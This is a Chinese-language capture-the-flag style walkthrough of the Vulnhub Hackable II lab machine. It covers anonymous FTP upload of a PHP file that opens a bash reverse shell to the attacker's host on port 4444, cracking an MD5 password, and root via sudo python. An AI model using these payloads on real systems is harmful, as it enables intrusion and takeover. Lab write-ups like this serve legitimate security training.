【滲透測試】Vulnhub Hackable II

Mr_Soap發表於2024-08-19

滲透環境

攻擊機: IP: 192.168.216.129(Kali)
靶機: IP:192.168.216.131
靶機下載地址:https://www.vulnhub.com/entry/hackable-ii,711/

進行滲透

一、 獲取埠資訊

該虛擬機器匯入VMware需要在拯救模式中重新配置一下網路卡名稱,附上教程,不再贅述:https://blog.csdn.net/liver100day/article/details/119109320

進行埠掃描

nmap -O -sV -p- -A 192.168.216.131

img

掃描WEB目錄

img

img

開啟CALL.html,沒有什麼發現

img

嘗試使用nmap掃描FTP服務,看是否允許匿名登入

nmap --script ftp-anon 192.168.216.131

img

掃描結果表明該主機的FTP服務允許匿名登入,且匿名使用者能夠訪問至少一個檔案(CALL.html

登入FTP服務,使用者名稱為anonymous,密碼不用輸入(直接敲回車)

img

二、 尋找WEB漏洞

檢視檔案,並下載CALL.html

dir
get CALL.html

img

下載後瀏覽CALL.html原始碼並未發現有用資訊
嘗試上傳檔案,在攻擊機當前路徑下寫檔案test.php,內容如下:

<?=phpinfo();?>

透過FTP上傳到目標機器

put test.php

img

上傳成功,且在/files/下可以看到該檔案,訪問該檔案,發現可以成功解析

img

接下來的思路就比較清晰了,寫一個PHP檔案,觸發時讓目標機器反向連線我們的攻擊機來反彈shell。
trojan.php,內容如下:

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.216.129/4444 0>&1'");?>

將其上傳

put trojan.php

攻擊機啟動監聽

nc -nlvp 4444

瀏覽器訪問trojan.php,觸發木馬進行反向連線

img

成功反彈shell

三、 提權

接下來進入/home目錄,可以看到一個shrek使用者,另外還有一個important.txt

img

讀取important.txt

img

提示我們執行/.runme.sh

img

後面的字串顯然是經過md5運算的,我們使用線上md5破解網站進行解碼,得到密碼:onion

img

建立互動式shell,切換到使用者shrek

python3 -c 'import pty;pty.spawn("/bin/bash")'
su shrek

img

常規思路,檢視一下具有SUID許可權的檔案

find / -perm -u=s -type f 2>/dev/null

沒有什麼發現

img

檢視shrek使用者可執行的特權命令

sudo -l

img

寫一個py檔案root.py,內容如下:

echo 'import pty;pty.spawn("/bin/bash")' > root.py

該檔案的作用就是開啟一個互動式的shell

img

接下來執行

sudo /usr/bin/python3.5 /home/shrek/root.py

這裡建議都使用絕對路徑,相對路徑有時無法成功執行。

這樣就用root的身份登入了shell,滲透結束。

相關文章